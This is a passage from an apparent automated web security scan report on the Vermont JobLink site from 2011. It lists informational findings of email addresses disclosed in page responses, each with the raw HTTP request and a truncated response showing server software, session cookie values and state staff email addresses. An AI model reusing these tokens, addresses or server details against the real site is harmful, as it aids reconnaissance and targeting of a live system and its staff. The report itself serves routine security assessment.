PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.251. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_veterans_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_veterans_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.252. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_warn_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_warn_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/mn_warninfo_dsp.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

22.253. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/services/schools/schsearch.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/services/schools/schsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.254. https://www.vermontjoblink.com/ada/works/FAQ.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/FAQ.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/works/FAQ.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.255. https://www.vermontjoblink.com/ada/works/Login.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.256. https://www.vermontjoblink.com/ada/works/contactus.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/contactus.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.257. https://www.vermontjoblink.com/ada/works/employeroverview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/employeroverview.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.258. https://www.vermontjoblink.com/ada/works/joboverview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/joboverview.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.259. https://www.vermontjoblink.com/ada/works/jobsearch.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/jobsearch.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.260. https://www.vermontjoblink.com/ada/works/linkview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/linkview.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ada/works/linkview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...
<a href="mailto:vjl@state.vt.us">vjl@state.vt.us</a>
...[SNIP]...

22.261. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/works/resourcesoverview.cfm

